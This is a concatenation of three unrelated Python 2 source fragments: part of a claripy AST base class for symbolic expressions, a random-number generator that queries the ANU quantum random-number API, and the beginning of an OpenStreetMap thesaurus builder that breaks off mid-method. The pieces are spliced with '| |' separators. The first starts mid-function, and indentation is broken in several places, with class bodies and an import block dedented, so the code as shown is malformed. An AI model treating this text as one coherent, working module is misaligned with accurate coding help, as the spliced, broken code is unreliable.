        elif op == 'BoolV':
            value = str(args[0])
        elif op == 'BVV':
            if self.args[0] is None:
                value = '!'
            elif self.args[1] < 10:
                # Small bit-widths print in decimal, wider ones in hex.
                value = format(self.args[0], '')
            else:
                value = format(self.args[0], '#x')
            value += ('#' + str(self.length)) if explicit_length else ''
        elif op == 'If':
            value = 'if {} then {} else {}'.format(_inner_repr(args[0], max_depth=max_depth),
                                                   _inner_repr(args[1], max_depth=max_depth),
                                                   _inner_repr(args[2], max_depth=max_depth))
            if inner:
                value = '({})'.format(value)
        elif op == 'Not':
            value = '!{}'.format(_inner_repr(args[0], max_depth=max_depth))
        elif op == 'Extract':
            value = '{}[{}:{}]'.format(_inner_repr(args[2], max_depth=max_depth), args[0], args[1])
        elif op == 'ZeroExt':
            value = '0#{} .. {}'.format(args[0], _inner_repr(args[1], max_depth=max_depth))
            if inner:
                value = '({})'.format(value)
        elif op == 'Concat':
            value = ' .. '.join(_inner_repr(a, explicit_length=True, max_depth=max_depth) for a in self.args)
        elif len(args) == 2 and op in operations.infix:
            value = '{} {} {}'.format(_inner_repr(args[0], max_depth=max_depth),
                                      operations.infix[op],
                                      _inner_repr(args[1], max_depth=max_depth))
            if inner:
                value = '({})'.format(value)
        else:
            # Fallback: generic function-call style.
            value = "{}({})".format(op,
                                    ', '.join(_inner_repr(a, max_depth=max_depth) for a in args))

        if not inner:
            value = '<{} {}>'.format(self._type_name(), value)

        return value
    except RuntimeError:
        # Re-raise recursion-limit failures with the original traceback
        # (Python 2 three-argument raise syntax).
        e_type, value, traceback = sys.exc_info()
        raise ClaripyRecursionError, ("Recursion limit reached during display. I sorry.", e_type, value), traceback
@property
def depth(self):
    """
    The depth of this AST. For example, an AST representing (a+(b+c)) would have a depth of 2.
    """
    # Recomputed on each access (with per-call memoization in _depth).
    return self._depth()
def _depth(self, memoized=None):
    """
    :param memoized: A dict of ast cache_keys to depths we've seen before.
    :return: The depth of the AST. For example, an AST representing (a+(b+c))
             would have a depth of 2.
    """
    if memoized is None:
        memoized = {}

    deepest = 0
    for child in self.args:
        if not isinstance(child, Base):
            continue
        key = child.cache_key
        if key not in memoized:
            memoized[key] = child._depth(memoized)
        if memoized[key] > deepest:
            deepest = memoized[key]

    return deepest + 1
@property
def recursive_children_asts(self):
    # Pre-order generator over every AST descendant. No seen-set is kept,
    # so shared sub-ASTs are yielded once per occurrence.
    for a in self.args:
        if isinstance(a, Base):
            l.debug("Yielding AST %s with hash %s with %d children", a, hash(a), len(a.args))
            yield a
            for b in a.recursive_children_asts:
                yield b
@property
def recursive_leaf_asts(self):
    # Generator over all depth-1 (leaf) descendants of this AST.
    return self._recursive_leaf_asts()
def _recursive_leaf_asts(self, seen=None):
    """
    Generator over the leaf (depth-1) ASTs underneath this AST.

    :param seen: set of cache_keys already visited, used to avoid re-walking
                 shared sub-ASTs and yielding duplicate leaves.
    """
    if self.depth == 1:
        yield self
        return

    seen = set() if seen is None else seen
    for a in self.args:
        if isinstance(a, Base) and a.cache_key not in seen:
            seen.add(a.cache_key)
            if a.depth == 1:
                yield a
            else:
                # BUGFIX: recurse directly with the shared `seen` set. The old
                # code went through the `recursive_leaf_asts` property, which
                # starts a fresh traversal and discards `seen`, so shared
                # subtrees were re-visited and duplicate leaves were yielded.
                for b in a._recursive_leaf_asts(seen=seen):
                    yield b
def dbg_is_looped(self, seen=None, checked=None):
    """
    Debug helper: detect whether this AST contains itself as a descendant.

    :param seen: hashes of ASTs on the current path from the root.
    :param checked: hashes of ASTs already proven loop-free.
    :returns: the looped AST if a cycle is found, otherwise False.
    """
    seen = set() if seen is None else seen
    checked = set() if checked is None else checked

    l.debug("Checking AST with hash %s for looping", hash(self))
    if hash(self) in seen:
        return self
    elif hash(self) in checked:
        return False
    else:
        seen.add(hash(self))

        for a in self.args:
            if not isinstance(a, Base):
                continue

            # A *copy* of `seen` is passed so sibling subtrees don't pollute
            # each other's path; `checked` is shared to avoid re-work.
            r = a.dbg_is_looped(seen=set(seen), checked=checked)
            if r is not False:
                return r

        checked.add(hash(self))
        return False
#
# Various AST modifications (replacements)
#
def _replace(self, replacements, variable_set=None, leaf_operation=None):
    """
    A helper for replace().

    :param replacements: A dictionary of cache_keys to their replacement ASTs.
                         Also serves as a memo table: it is mutated as new
                         replacements are discovered during the walk.
    :param variable_set: For optimization, ast's without these variables are not checked for replacing.
    :param leaf_operation: optional callable applied to leaf ASTs (ops listed
                           in operations.leaf_operations) to produce their
                           replacements.
    """
    try:
        if variable_set is None:
            variable_set = set()

        hash_key = self.cache_key

        if hash_key in replacements:
            # Already computed (or explicitly requested) replacement.
            r = replacements[hash_key]
        elif not self.variables.issuperset(variable_set):
            # This subtree cannot contain all the variables being replaced.
            r = self
        elif leaf_operation is not None and self.op in operations.leaf_operations:
            r = leaf_operation(self)
            if r is not self:
                replacements[hash_key] = r
            return r
        else:
            # Recurse into AST arguments; rebuild only if a child changed.
            new_args = [ ]
            replaced = False
            for a in self.args:
                if isinstance(a, Base):
                    new_a = a._replace(replacements=replacements, variable_set=variable_set, leaf_operation=leaf_operation)
                    replaced |= new_a is not a
                else:
                    new_a = a
                new_args.append(new_a)

            if replaced:
                r = self.make_like(self.op, tuple(new_args))
                replacements[hash_key] = r
            else:
                r = self

        return r
    except ClaripyReplacementError:
        # Best-effort: log and leave this subtree untouched.
        l.error("Replacement error:", exc_info=True)
        return self
def swap_args(self, new_args, new_length=None):
    """
    This returns the same AST, with the arguments swapped out for new_args.

    :param new_args: the replacement argument sequence.
    :param new_length: an optional replacement bit-length; defaults to this
                       AST's current length.
    """
    unchanged = (len(self.args) == len(new_args)
                 and all(old is new for old, new in zip(self.args, new_args)))
    if unchanged:
        return self

    out_length = self.length if new_length is None else new_length
    return self.__class__(self.op, new_args, length=out_length)
#
# Other helper functions
#
def split(self, split_on):
    """
    Splits the AST if its operation is `split_on` (i.e., return all the arguments). Otherwise, return a list with
    just the AST.
    """
    if self.op not in split_on:
        return [ self ]
    return list(self.args)
# we don't support iterating over Base objects
def __iter__(self):
    """
    This prevents people from iterating over ASTs.
    """
    # Deliberately unsupported: iterating a (possibly symbolic) AST as if it
    # were a sequence would silently do the wrong thing.
    raise ClaripyOperationError("Please don't iterate over, or split, AST nodes!")
def __nonzero__(self):
    """
    This prevents people from accidentally using an AST as a condition. For
    example, the following was previously common::

        a,b = two ASTs
        if a == b:
            do something

    The problem is that `a == b` would return an AST, because an AST can be symbolic
    and there could be no way to actually know the value of that without a
    constraint solve. This caused tons of issues.
    """
    # Python 2 truthiness hook (Python 3 uses __bool__).
    raise ClaripyOperationError('testing Expressions for truthiness does not do what you want, as these expressions can be symbolic')
def structurally_match(self, o):
    """
    Structurally compares two A objects, and check if their corresponding leaves are definitely the same A object
    (name-wise or hash-identity wise).

    :param o: the other claripy A object
    :return: True/False
    """
    # TODO: Convert a and b into canonical forms

    if self.op != o.op:
        return False

    if len(self.args) != len(o.args):
        return False

    for arg_a, arg_b in zip(self.args, o.args):
        if not isinstance(arg_a, Base):
            # Non-AST arguments must match both by type and by value.
            if type(arg_a) != type(arg_b):
                return False
            # They are not ASTs
            if arg_a != arg_b:
                return False
            else:
                continue

        # NOTE(review): 'FP' does not appear as an op elsewhere in this file
        # ('FPS'/'FPV' do) -- confirm whether 'FP' is a real leaf op here.
        if arg_a.op in ('I', 'BVS', 'FP'):
            # This is a leaf node in AST tree: it must be the identical object.
            if arg_a is not arg_b:
                return False
        else:
            if not arg_a.structurally_match(arg_b):
                return False

    return True
def replace(self, old, new):
    """
    Returns an AST with all instances of the AST 'old' replaced with AST 'new'.

    :raises ClaripyReplacementError: if old/new are not ASTs of the same class.
    """
    self._check_replaceability(old, new)
    return self._replace({old.cache_key: new}, variable_set=old.variables)
def replace_dict(self, replacements):
    """
    :param replacements: A dictionary of cache_keys of asts to replace, mapped
                         to their replacement ASTs (see replace(), which builds
                         such a dict from a single old/new pair).
    :return: An AST with all instances of ast's in replacements.
    """
    # NOTE: unlike replace(), no replaceability validation is performed here.
    return self._replace(replacements, variable_set=set())
@staticmethod
def _check_replaceability(old, new):
    """Raise ClaripyReplacementError unless *old* and *new* are ASTs of the same class."""
    if not (isinstance(old, Base) and isinstance(new, Base)):
        raise ClaripyReplacementError('replacements must be AST nodes')
    if type(old) is not type(new):
        raise ClaripyReplacementError('cannot replace type %s ast with type %s ast' % (type(old), type(new)))
def _identify_vars(self, all_vars, counter):
    """
    Recursively collect the leaf variables of this AST into *all_vars*.

    :param all_vars: dict mapping a leaf's args tuple to a replacement variable.
    :param counter: iterator yielding unique ints, used to name fresh BoolS vars.
    """
    if self.op == 'BVS':
        if self.args not in all_vars:
            # Recreate the BVS with the same name/args, pinned via explicit_name.
            all_vars[self.args] = BV('BVS', self.args, length=self.length, explicit_name=True)
    elif self.op == 'BoolS':
        if self.args not in all_vars:
            all_vars[self.args] = BoolS('var_' + str(next(counter)))
    else:
        for arg in self.args:
            if isinstance(arg, Base):
                arg._identify_vars(all_vars, counter)
def canonicalize(self, var_map=None, counter=None):
    """
    Rename every leaf symbol in this AST to a position-independent
    'canonical_%d' name, so structurally-equal ASTs compare equal.

    :param var_map: optional pre-seeded dict of cache_key -> renamed leaf.
    :param counter: optional integer iterator for naming; a fresh
                    itertools.count() is used if not given.
    :returns: a (var_map, counter, canonical_ast) tuple.
    """
    counter = itertools.count() if counter is None else counter
    var_map = { } if var_map is None else var_map

    for v in self._recursive_leaf_asts():
        # BUGFIX: 'FPS' was misspelled 'FPs', so floating-point symbols were
        # silently never canonicalized (note _rename() accepts exactly
        # {'BVS', 'BoolS', 'FPS'}).
        if v.cache_key not in var_map and v.op in { 'BVS', 'BoolS', 'FPS' }:
            new_name = 'canonical_%d' % next(counter)
            var_map[v.cache_key] = v._rename(new_name)

    return var_map, counter, self.replace_dict(var_map)
#
# This code handles burrowing ITEs deeper into the ast and excavating
# them to shallower levels.
#
def _burrow_ite(self):
    """
    Push an If at this node one level deeper into its operands, when both
    branches share the same operation and differ in their arguments.
    """
    if self.op != 'If':
        # Not an If: just burrow each child independently.
        return self.swap_args([ (a.ite_burrowed if isinstance(a, Base) else a) for a in self.args ])

    if not all(isinstance(a, Base) for a in self.args):
        # Can't inspect non-AST arguments.
        return self

    old_true = self.args[1]
    old_false = self.args[2]

    # Both branches must have the same op and arity to be merged.
    if old_true.op != old_false.op or len(old_true.args) != len(old_false.args):
        return self

    if old_true.op == 'If':
        # Don't burrow into nested ITEs for now.
        return self

    if any(a.op in {'BVS', 'BVV', 'FPS', 'FPV', 'BoolS', 'BoolV'} for a in self.args):
        # Burrowing through leaf nodes makes no sense.
        return self

    # NOTE(review): this requires exactly one *matching* argument (and not all
    # matching). For two-argument ops that coincides with "exactly one
    # differing"; for 3+-arg ops it bails on single differences -- confirm
    # whether that is intended.
    matches = [ old_true.args[i] is old_false.args[i] for i in range(len(old_true.args)) ]
    if matches.count(True) != 1 or all(matches):
        # TODO: handle multiple differences for multi-arg ast nodes
        return self

    different_idx = matches.index(False)
    # Build the inner If over the one differing argument, then rebuild the
    # shared operation around it.
    inner_if = If(self.args[0], old_true.args[different_idx], old_false.args[different_idx])
    new_args = list(old_true.args)
    new_args[different_idx] = inner_if.ite_burrowed
    return old_true.__class__(old_true.op, new_args, length=self.length)
def _excavate_ite(self):
    """
    Pull If expressions from this node's arguments up toward the root,
    producing If(cond, op(true_args), op(false_args)).
    """
    if self.op in { 'BVS', 'I', 'BVV' }:
        # Leaves have nothing to excavate.
        return self

    excavated_args = [ (a.ite_excavated if isinstance(a, Base) else a) for a in self.args ]
    ite_args = [ isinstance(a, Base) and a.op == 'If' for a in excavated_args ]

    if self.op == 'If':
        # if we are an If, call the If handler so that we can take advantage of its simplifiers
        return If(*excavated_args)
    elif ite_args.count(True) == 0:
        # if there are no ifs that came to the surface, there's nothing more to do
        return self.swap_args(excavated_args)
    else:
        # this gets called when we're *not* in an If, but there are Ifs in the args.
        # it pulls those Ifs out to the surface.
        cond = excavated_args[ite_args.index(True)].args[0]

        new_true_args = [ ]
        new_false_args = [ ]

        for a in excavated_args:
            if not isinstance(a, Base) or a.op != 'If':
                # Non-If arguments are the same on both sides.
                new_true_args.append(a)
                new_false_args.append(a)
            elif a.args[0] is cond:
                # Same condition object: take the matching branch on each side.
                new_true_args.append(a.args[1])
                new_false_args.append(a.args[2])
            elif a.args[0] is Not(cond):
                # Negated condition: branches swap sides.
                new_true_args.append(a.args[2])
                new_false_args.append(a.args[1])
            else:
                # weird conditions -- giving up!
                return self.swap_args(excavated_args)

        return If(cond, self.swap_args(new_true_args), self.swap_args(new_false_args))
@property
def ite_burrowed(self):
    """
    Returns an equivalent AST that "burrows" the ITE expressions as deep as possible into the ast, for simpler
    printing.
    """
    if self._burrowed is None:
        self._burrowed = self._burrow_ite() #pylint:disable=attribute-defined-outside-init
        # The result is its own fixpoint: burrowing it again is a no-op.
        self._burrowed._burrowed = self._burrowed
    return self._burrowed
@property
def ite_excavated(self):
    """
    Returns an equivalent AST that "excavates" the ITE expressions out as far as possible toward the root of the
    AST, for processing in static analyses.
    """
    if self._excavated is None:
        self._excavated = self._excavate_ite() #pylint:disable=attribute-defined-outside-init

        # we set the flag for the children so that we avoid re-excavating during
        # VSA backend evaluation (since the backend evaluation recursively works on
        # the excavated ASTs)
        self._excavated._excavated = self._excavated
    return self._excavated
#
# these are convenience operations
#
def _first_backend(self, what):
    """
    Ask each registered backend (skipping ones that already errored on this
    AST) for attribute *what*; return the first successful result, or None
    implicitly if every backend fails with BackendError.
    """
    for backend in backends._all_backends:
        if backend in self._errored:
            continue
        try:
            return getattr(backend, what)(self)
        except BackendError:
            continue
@property
def singlevalued(self):
    # Delegates to the first non-errored backend implementing 'singlevalued'.
    return self._first_backend('singlevalued')
@property
def multivalued(self):
    # Delegates to the first non-errored backend implementing 'multivalued'.
    return self._first_backend('multivalued')
@property
def cardinality(self):
    # Delegates to the first non-errored backend implementing 'cardinality'.
    return self._first_backend('cardinality')
@property
def concrete(self):
    # Whether the concrete backend can handle this AST at all.
    return backends.concrete.handles(self)
@property
def uninitialized(self):
    """
    Whether this AST comes from an uninitialized dereference or not. It's only used in under-constrained symbolic
    execution mode.

    :return: True/False/None (unspecified).
    """
    #TODO: It should definitely be moved to the proposed Annotation backend.
    return self._uninitialized
@property
def uc_alloc_depth(self):
    """
    The depth of allocation by lazy-initialization. It's only used in under-constrained symbolic execution mode.

    :return: An integer indicating the allocation depth, or None if it's not from lazy-initialization.
    """
    # TODO: It should definitely be moved to the proposed Annotation backend.
    return self._uc_alloc_depth
#
# Backwards compatibility crap
#
@property
def model(self):
    """
    Deprecated. Returns the first backend model (concrete, then vsa, then z3)
    that differs from this AST itself, or the AST if none converted.
    """
    l.critical("DEPRECATION WARNING: do not use AST.model. It is deprecated, no longer does what is expected, and "
               "will soon be removed. If you *need* to access the model use AST._model_X where X is the backend "
               "that you are interested in.")
    print("DEPRECATION WARNING: do not use AST.model. It is deprecated, no longer does what is expected, and will "
          "soon be removed. If you *need* to access the model use AST._model_X where X is the backend that you are "
          "interested in.")
    # _model_* attributes resolve via __getattr__ below and fall back to self.
    return self._model_concrete if self._model_concrete is not self else \
           self._model_vsa if self._model_vsa is not self else \
           self._model_z3 if self._model_z3 is not self else \
           self
def __getattr__(self, a):
    """
    Resolve `_model_<backend>` attributes by converting this AST with the named
    backend; returns `self` unchanged if the backend cannot handle it.

    :raises AttributeError: for any other attribute name, or unknown backend.
    """
    if not a.startswith('_model_'):
        raise AttributeError(a)

    model_name = a[7:]  # strip the '_model_' prefix
    if not hasattr(backends, model_name):
        raise AttributeError(a)

    try:
        return getattr(backends, model_name).convert(self)
    except BackendError:
        return self
def simplify(e):
    """
    Return a simplified version of this expression, via the first backend that
    implements 'simplify'; returns the expression unchanged if none can.

    NOTE(review): the receiver is named `e` rather than `self`; it behaves as
    an ordinary instance method here.
    """
    # 'I' (concrete wrapper) nodes are already as simple as they get.
    if isinstance(e, Base) and e.op == 'I':
        return e

    s = e._first_backend('simplify')
    if s is None:
        l.debug("Unable to simplify expression")
        return e
    else:
        # Copy some parameters (that should really go to the Annotation backend)
        s._uninitialized = e.uninitialized
        s._uc_alloc_depth = e._uc_alloc_depth
        s._simplified = Base.FULL_SIMPLIFY
        return s
from ..errors import BackendError, ClaripyOperationError, ClaripyRecursionError, ClaripyReplacementError
from .. import operations
from ..backend_object import BackendObject
from ..backend_manager import backends
from ..ast.bool import If, Not, BoolS
from ..ast.bv import BV
| |
#!/usr/bin/env python
" quantumRandom.py "
from math import log as _log, ceil as _ceil, floor as _floor
from random import Random
from urllib import urlencode, quote as urlquote
from urllib2 import Request, urlopen
import sys
bitsPerFloat = sys.float_info.mant_dig
try:
import json
except ImportError:
import simplejson as json
class QuantumRandom(Random):
    """Alternate random number generator using the ANU Quantum
    Random Numbers Server as the source.

    Requires Internet access."""

    _URL = 'https://qrng.anu.edu.au/API/jsonI.php'
    _DATATYPES = ['uint8', 'uint16', 'hex16']
    _MAXLEN = 1024
    _MAXINT = 65536
    _generator = None  # lazily-created cached_generator()

    def _fetch(self, dataType, arrayLength=1, blockSize=1):
        "Fetch data from the ANU Quantum Random Numbers JSON API"
        # BUGFIX: these raises previously used the non-existent name
        # 'ValueException', which would have raised NameError at runtime
        # instead of the intended argument-validation error.
        if dataType not in self._DATATYPES:
            raise ValueError('dataType must be one of %s' % self._DATATYPES)
        if arrayLength > self._MAXLEN:
            raise ValueError('arrayLength cannot be larger than %d' % self._MAXLEN)
        if blockSize > self._MAXLEN:
            raise ValueError('blockSize cannot be larger than %d' % self._MAXLEN)
        options = dict(type=dataType, length=arrayLength, size=blockSize)
        # Consistency fix: build the request from the _URL constant instead of
        # a second hard-coded copy of the endpoint.
        url = self._URL + '?' + urlencode(options)
        def object_hook(obj):
            # hex16 payloads arrive as unicode strings; normalize to ascii.
            if obj.get('type') == 'string':
                obj['data'] = [s.encode('ascii') for s in obj['data']]
            return obj
        data = json.loads(urlopen(url).read(), object_hook=object_hook)
        assert data['success'] is True, data
        assert data['length'] == arrayLength, data
        return data['data']

    def cached_generator(self, dataType='uint16', cacheSize=None):
        """Returns numbers from the ANU Quantum Random Numbers Server.
        Caches numbers to avoid latency."""
        if cacheSize is None:
            cacheSize = self._MAXLEN
        while 1:
            # Fetch a full block of values at once, then drain it.
            for n in self._fetch(dataType, cacheSize, cacheSize):
                yield n

    def random(self, generator=None):
        # Map k random bits into [0, 1).
        return self.getrandbits(bitsPerFloat, generator) * 2**-bitsPerFloat
    random.__doc__ = Random.random.__doc__

    def getrandbits(self, k, generator=None):
        "getrandbits(k) -> x. Generates a long int with k random bits."
        if k == 0:
            return 0
        if generator is None:
            if self._generator is None:
                self._generator = self.cached_generator()
            generator = self._generator
        maxlen = self._MAXLEN
        if k <= 16*maxlen: # A uint16 fetch supplies enough bits
            r = 0
            for i in xrange((k + 15) // 16):
                r <<= 16
                r |= generator.next()
            if k%16:
                # Drop the excess low bits of the final 16-bit word.
                r >>= 16 - (k%16)
            return r
        else:
            # Large requests: assemble a hex string from bulk hex16 fetches.
            fullFetch = 8*maxlen*maxlen
            fullBlock = 8*maxlen
            remainingBits = k%fullBlock
            hexString = ''
            if remainingBits:
                s = hex(self.getrandbits(remainingBits, generator))
                hexString = (s[:-1] if s.endswith('L') else s)
            if k >= fullFetch:
                hexString += ''.join(''.join(self._fetch('hex16', maxlen, maxlen)) for i in xrange(k // fullFetch))
                k %= fullFetch
            if k >= fullBlock:
                hexString += ''.join(self._fetch('hex16', k // fullBlock, maxlen))
            return long(hexString, 16)

    def _stub(self, *args, **kwargs):
        "Stub method. Not used for a remote random number generator."
        return None
    seed = _stub
    jumpahead = _stub

    def _notimplemented(self, *args, **kwargs):
        "Method should not be called for a remote random number generator."
        raise NotImplementedError('Remote entropy sources do not have state.')
    getstate = _notimplemented
    setstate = _notimplemented

    ## -------------------- integer methods  -------------------

    def randrange(self, start, stop=None, step=1, generator=None):
        # This function exactly parallels the code in Random.py,
        # so most comments are copied here.
        # This code is a bit messy to make it fast for the
        # common case while still doing adequate error checking.
        istart = int(start)
        if istart != start:
            raise ValueError('non-integer arg 1 for randrange()')
        if stop is None:
            if istart > 0:
                return self._randbelow(istart, generator)
            raise ValueError('empty range for randrange()')

        # stop argument supplied.
        istop = int(stop)
        if istop != stop:
            raise ValueError('non-integer stop for randrange()')
        width = istop - istart
        if step == 1:
            if width > 0:
                return int(istart + self._randbelow(width, generator))
            raise ValueError('empty range for randrange() (%d,%d, %d)' % (istart, istop, width))

        # Non-unit step argument supplied.
        istep = int(step)
        if istep != step:
            raise ValueError('non-integer step for randrange()')
        if istep > 0:
            n = (width + istep - 1) // istep
        elif istep < 0:
            n = (width + istep + 1) // istep
        else:
            raise ValueError('zero step for randrange()')
        if n <= 0:
            raise ValueError('empty range for randrange()')
        return int(istart + istep*self._randbelow(n, generator))
    randrange.__doc__ = Random.randrange.__doc__

    def _randbelow(self, n, generator=None, _log=_log, int=int):
        # Rejection-sample k-bit values until one falls below n.
        k = int(1.00001 + _log(n-1, 2.0))   # 2**k > n-1 > 2**(k-2)
        r = self.getrandbits(k, generator)
        while r >= n:
            r = self.getrandbits(k, generator)
        return r
    _randbelow.__doc__ = Random._randbelow.__doc__

    ## -------------------- sequence methods  -------------------

    def choice(self, seq, generator=None):
        length = len(seq)
        if length == 0:
            raise IndexError('list index out of range')
        return seq[self.randrange(length, generator=generator)]
    choice.__doc__ = Random.choice.__doc__

    def shuffle(self, x, random=None, generator=None):
        # Fisher-Yates; defer to the base class if a plain random() is given.
        if random is not None:
            return Random.shuffle(self, x, random)
        randrange = self.randrange
        for i in reversed(xrange(1, len(x))):
            # pick an element in x[:i+1] with which to exchange x[i]
            j = randrange(i + 1, generator=generator)
            x[i], x[j] = x[j], x[i]
    shuffle.__doc__ = Random.shuffle.__doc__

    def sample(self, population, k, generator=None):
        # This function exactly parallels the code in Random.py.
        # Comments are therefore omitted, to save space.
        n = len(population)
        if not 0 <= k <= n:
            raise ValueError('sample larger than population')
        randrange = self.randrange
        result = [None] * k
        setsize = 21
        if k > 5:
            setsize += 4 ** _ceil(_log(k * 3, 4))
        if n <= setsize or hasattr(population, 'keys'):
            pool = list(population)
            for i in xrange(k):
                j = randrange(n-i, generator=generator)
                result[i] = pool[j]
                pool[j] = pool[n-i-1]
        else:
            try:
                selected = set()
                selected_add = selected.add
                for i in xrange(k):
                    j = randrange(n, generator=generator)
                    while j in selected:
                        j = randrange(n, generator=generator)
                    selected_add(j)
                    result[i] = population[j]
            except (TypeError, KeyError):
                if isinstance(population, list):
                    raise
                return self.sample(tuple(population), k, generator)
        return result
    sample.__doc__ = Random.sample.__doc__
if __name__ == '__main__':
    # Print the module docstring. Function-call form works under both
    # Python 2 and Python 3 (the old `print __doc__.strip()` statement
    # was Python-2-only syntax).
    print(__doc__.strip())
| |
# -*- coding: utf-8 -*-
'''
Created on 27.09.2014
@author: Simon Gwerder
'''
from thesaurus.mapsemnet import MapOSMSemanticNet
from thesaurus.rdfgraph import RDFGraph
from utilities import utils
from utilities.configloader import ConfigLoader
from utilities.translator import Translator
from filter import Filter
class BaseThesaurus:
# NOTE(review): these are class attributes, shared by every instance unless
# shadowed in __init__ -- confirm that sharing (e.g. of rdfGraph) is intended.
rdfGraph = RDFGraph()
tagInfo = None  # TagInfo API facade, injected via __init__

# Totals filled in by createBaseThesaurus().
numberKeys = 0
numberTags = 0

cl = ConfigLoader()
# Naming/labeling strings sourced from the external configuration.
osmWikiBase = cl.getThesaurusString('OSM_WIKI_PAGE')
keySchemeName = cl.getThesaurusString('KEY_SCHEME_NAME')
tagSchemeName = cl.getThesaurusString('TAG_SCHEME_NAME')
keySchemeTitle = cl.getThesaurusString('KEY_SCHEME_TITLE')
tagSchemeTitle = cl.getThesaurusString('TAG_SCHEME_TITLE')
creator = cl.getThesaurusString('CREATOR')
outputName = cl.getThesaurusString('OUTPUT_NAME') # tagfinder_thesaurus
outputEnding = cl.getThesaurusString('DEFAULT_FORMAT') # .rdf
translationHintDE = cl.getThesaurusString('TRANSLATION_HINT_DE')
translationHintEN = cl.getThesaurusString('TRANSLATION_HINT_EN')
editNote = cl.getThesaurusString('NO_TERM')
# Minimum occurrence count for a key/value to be accepted (see filter* methods).
valueMinCount = cl.getThesaurusInt('MINIMUM_COUNT')

filterUtil = Filter()
translator = Translator()
console = None  # optional progress/output writer
def __init__(self, tagInfo, rdfGraph=None, console=None):
    """
    :param tagInfo: TagInfo API facade; if None, the instance is left with the
                    class-level defaults untouched.
    :param rdfGraph: optional graph to build into (otherwise the shared
                     class-level graph is used).
    :param console: optional output writer for progress messages.
    """
    if tagInfo is None:
        return
    self.tagInfo = tagInfo
    if rdfGraph is not None:
        self.rdfGraph = rdfGraph
    if console is not None:
        self.console = console
def createBaseThesaurus(self, console):
    '''Build the full base thesaurus: fetch valid keys and tags from TagInfo,
    populate the RDF graph, link OSM relations, map to the OSM Semantic Net
    and serialize the result to a temp file.'''
    if console is not None:
        self.console = console
    self.printMessage(' Requesting valid OSM keys from "' + self.cl.getTagInfoAPIString('TAGINFO_PAGE') + '":')
    keyList = self.getListOfValidKeys()
    # Keys excluded by the filter are still counted and added (valueless) below.
    self.numberKeys = len(keyList) + len(self.filterUtil.exactKeyFilter)
    self.printMessage(' Got ' + str(len(keyList)) + ' valid OSM keys. ' + str(len(self.filterUtil.exactKeyFilter)) + ' are additional keys from filter.')

    self.printMessage('\n Requesting valid OSM tags from "' + self.cl.getTagInfoAPIString('TAGINFO_PAGE') + '":')
    tagMap = self.bundleToTagMap(keyList)
    self.numberTags = self.getNumberTags(tagMap)
    self.printMessage(' Got ' + str(self.numberTags) + ' valid OSM tags.')

    empty = []
    # NOTE(review): every filtered key shares the *same* empty list object;
    # mutating one entry would affect all of them -- confirm intended.
    for filteredKey in self.filterUtil.exactKeyFilter:
        tagMap[filteredKey] = empty

    self.printMessage('\n Requesting detailed information from "' + self.cl.getTagInfoAPIString('TAGINFO_PAGE') + '":')
    self.createGraph(keyList, tagMap)

    self.printMessage('\n Linking OSM "implies", "combines" and "links" relations to graph concepts')
    self.osmLinksToConcept()

    self.printMessage('\n Create mapping to OSM Semantic Net')
    osnSemNetFilePath = utils.semnetDir() + 'osm_semantic_network.rdf'
    MapOSMSemanticNet(self.rdfGraph, osnSemNetFilePath)

    fullPath = utils.outputFile(utils.tempDir(), self.outputName, self.outputEnding, useDateEnding=True)
    # NOTE(review): rfind('\\') assumes Windows-style separators in fullPath.
    name = fullPath[fullPath.rfind('\\') + 1:]
    self.printMessage('\n Serializing graph to: ' + name)
    self.rdfGraph.serialize(fullPath)

    self.printMessage('\n Finished creating TagFinder BaseThesaurus')
def printPercent(self, partInt, totalInt, workingOn=None):
    '''Forward progress output to the attached console, if one was defined.'''
    if self.console is None:
        return
    self.console.printPercent(partInt, totalInt, workingOn)
def printMessage(self, message):
    '''Forward a message to the attached console, if one was defined.'''
    if self.console is None:
        return
    self.console.println(message)
def getNumberTags(self, tagMap):
    '''Returns number of tags in 'tagMap' (the total count of values across all keys).'''
    return sum(len(values) for values in tagMap.values())
def getBaseGraph(self):
    '''Getter for the base rdfGraph.'''
    return self.rdfGraph
def getListOfValidKeys(self):
    '''Calls TagInfo for a list of all keys. The elements in the list are then checked for their validity.
    'minCount' is a restriction on the number of occurrences of a key and the number of values per key.
    The returned list is descending sorted by count of values attached to the key.'''
    keyData = self.tagInfo.getAllKeyData()
    return self.filterKeyData(keyData)
def filterKeyData(self, keyData):
    '''Takes the raw key data from 'keyData' and makes validation checks on each
    element. Then a list of valid keys is returned.'''
    keyList = []
    total = len(keyData)
    for position, keyItem in enumerate(keyData, start=1):
        key = keyItem['key']
        # Accept keys that are not filtered out, use only valid characters, and
        # have enough distinct values attached.
        acceptable = (not self.filterUtil.hasKey(key)
                      and utils.validCharsCheck(key)
                      and keyItem['values_all'] >= self.valueMinCount)
        if acceptable:
            keyList.append(key)
        self.printPercent(partInt=position, totalInt=total, workingOn='Getting key: ' + key)
    self.printPercent(partInt=1, totalInt=1)
    return keyList
def filterTagData(self, key, tagMap, tagData):
    '''Takes the raw tag data from 'tagData' and makes validation checks on each
    element. Then the updated 'tagMap' (k:key, v:value) is returned.'''
    for valueItem in tagData:
        value = valueItem['value']
        # Reject filtered, non-wiki, invalid-character, or rare values.
        if (self.filterUtil.hasValue(value)
                or not valueItem['in_wiki']
                or not utils.validCharsCheck(value)
                or valueItem['count'] < self.valueMinCount):
            continue
        existing = tagMap.get(key)
        if existing is None:
            tagMap[key] = [value]
        else:
            existing.append(value)
    return tagMap
def bundleToTagMap(self, keyList):
    '''Creates a hash map with k:key and v:value of valid keys and values.'''
    tagMap = {}
    for position, key in enumerate(keyList, start=1):
        self.printPercent(position, len(keyList), 'Getting all tags for key: ' + key)
        tagData = self.tagInfo.getAllTagData(key)
        tagMap = self.filterTagData(key, tagMap, tagData)
    return tagMap
def addDepictionScopeNote(self, concept, wikiPageJson, new=True):
    '''Adds a depiction and scopeNote in EN and DE to the 'concept' (if available,
    also translates to the other language if only one is).

    :param concept: the graph concept to attach the data to.
    :param wikiPageJson: parsed OSM-wiki page data ('data' list of per-language entries).
    :param new: True adds fresh statements; False overwrites existing ones via set*.
    '''
    scopeNoteDE = ''
    scopeNoteEN = ''
    depiction = ''
    for wikiData in wikiPageJson['data']:
        if wikiData['lang'] == 'de':
            temp = wikiData['description']
            if temp is not None and not temp == '':
                # Strip wiki markup/prefixes from the German description.
                temp = temp.replace('\'', '')
                temp = temp.replace('[[w:','')
                temp = temp.replace('[[w', '')
                temp = temp.replace('[[de:','')
                temp = temp.replace('[[en:','')
                temp = temp.replace('en=','')
                temp = temp.replace('[[wikipedia:de:', '')
